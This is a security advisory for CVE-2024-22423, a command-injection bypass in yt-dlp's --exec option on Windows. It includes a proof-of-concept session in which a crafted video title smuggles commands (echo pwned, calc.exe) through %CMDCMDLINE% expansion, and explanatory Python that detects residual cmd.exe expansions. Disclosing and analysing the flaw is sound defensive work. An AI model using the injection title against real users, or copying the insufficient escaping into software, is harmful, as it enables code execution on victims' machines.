CVE-2024-22423: yt-dlp: `--exec` command injection when using `%q` in yt-dlp on Windows (Bypass of CVE-2023-40581)
The patch that addressed CVE-2023-40581 attempted to prevent RCE when using --exec with %q by replacing double quotes with two double quotes. However, this escaping is not sufficient, and still allows expansion of environment variables. Support for output template expansion in --exec, along with this vulnerable behavior, was added to yt-dlp in version 2021.04.11.
> yt-dlp "https://youtu.be/42xO6rVqf2E" --ignore-config -f 18 --exec "echo %(title)q"
[youtube] Extracting URL: https://youtu.be/42xO6rVqf2E
[youtube] 42xO6rVqf2E: Downloading webpage
[youtube] 42xO6rVqf2E: Downloading ios player API JSON
[youtube] 42xO6rVqf2E: Downloading android player API JSON
[youtube] 42xO6rVqf2E: Downloading m3u8 information
[info] 42xO6rVqf2E: Downloading 1 format(s): 18
[download] Destination: %CMDCMDLINE:~-1%&echo pwned&calc.exe [42xO6rVqf2E].mp4
[download] 100% of 126.16KiB in 00:00:00 at 2.46MiB/s
[Exec] Executing command: echo "%CMDCMDLINE:~-1%&echo pwned&calc.exe"
""
pwned
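To make the insufficiency concrete, the following Python is added here as an illustration; it is not code from the yt-dlp project. It renders an --exec template the way this page describes the CVE-2023-40581 escaping (the value is wrapped in double quotes and each embedded " becomes "") and then scans the rendered command line for %VAR% references, including substring forms like %NAME:~-1%, that cmd.exe would still expand because cmd.exe expands variables inside double quotes. The template renderer, the quote_fail_closed variant and the sample titles are constructed for this example and are not yt-dlp's own implementation.

```python
import re

# cmd.exe variable references, including the substring form %NAME:~start,len%.
# cmd.exe expands these even inside double quotes, which is why doubling the
# quotes in a value does nothing to stop the expansion.
CMD_VAR_REF = re.compile(r'%([A-Za-z_][^%\s]*)%')

# Output-template field in the %(name)q form used on this page.
TEMPLATE_FIELD = re.compile(r'%\((\w+)\)q')


def quote_by_doubling(value: str) -> str:
    """The escaping this page describes for %q on Windows (the CVE-2023-40581
    patch): wrap the value in double quotes and turn every embedded " into ""."""
    return '"' + value.replace('"', '""') + '"'


def quote_fail_closed(value: str) -> str:
    """Hardened variant constructed for this example (an assumption, not the
    project's fix): refuse any value containing '%', since no quote handling
    stops cmd.exe from expanding %VAR% inside double quotes."""
    if '%' in value:
        raise ValueError('value would be subject to cmd.exe %VAR% expansion')
    return quote_by_doubling(value)


def render_exec_template(template: str, fields: dict, quote=quote_by_doubling) -> str:
    """Toy model (assumed simplification) of expanding %(name)q fields in an
    --exec template: each field is replaced by the quoted field value."""
    return TEMPLATE_FIELD.sub(lambda m: quote(fields[m.group(1)]), template)


def residual_cmd_expansions(command: str) -> list:
    """Names cmd.exe would still try to expand in the rendered command line.
    A non-empty result means the value is live shell syntax despite the quoting,
    which is the condition a defender should reject or alert on."""
    return [m.group(1) for m in CMD_VAR_REF.finditer(command)]


# Constructed sample titles: the first is the title from the session above, the
# second only contains quotes, which the doubling handles correctly.
SAMPLE_TITLES = {
    'pwn': '%CMDCMDLINE:~-1%&echo pwned&calc.exe',
    'quoted': 'He said "hi" & left',
}


def demo():
    """Render each sample title with both quoting strategies and report what
    cmd.exe would still expand in the doubled-quote version."""
    results = {}
    for name, title in SAMPLE_TITLES.items():
        cmd = render_exec_template('echo %(title)q', {'title': title})
        try:
            hardened = render_exec_template('echo %(title)q', {'title': title},
                                            quote=quote_fail_closed)
        except ValueError as exc:
            hardened = f'rejected: {exc}'
        results[name] = (cmd, residual_cmd_expansions(cmd), hardened)
    return results


if __name__ == '__main__':
    for name, (cmd, leaks, hardened) in demo().items():
        print(f'{name}: {cmd}')
        print(f'   residual cmd.exe expansions: {leaks or "none"}')
        print(f'   fail-closed variant: {hardened}')
```

For the first sample the rendered command is exactly the `[Exec] Executing command:` line from the session above, and the scan reports `CMDCMDLINE:~-1` as a reference cmd.exe will expand; the quote-only sample renders cleanly, showing that quote doubling solves the problem it was written for but not this one.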
References
- github.com/advisories/GHSA-hjq6-52gw-2g7p
- github.com/yt-dlp/yt-dlp
- github.com/yt-dlp/yt-dlp/commit/de015e930747165dbb8fcd360f8775fd973b7d6e
- github.com/yt-dlp/yt-dlp/commit/ff07792676f404ffff6ee61b5638c9dc1a33a37a
- github.com/yt-dlp/yt-dlp/releases/tag/2021.04.11
- github.com/yt-dlp/yt-dlp/releases/tag/2024.04.09
- github.com/yt-dlp/yt-dlp/security/advisories/GHSA-42h4-v29r-42qg
- github.com/yt-dlp/yt-dlp/security/advisories/GHSA-hjq6-52gw-2g7p
- nvd.nist.gov/vuln/detail/CVE-2024-22423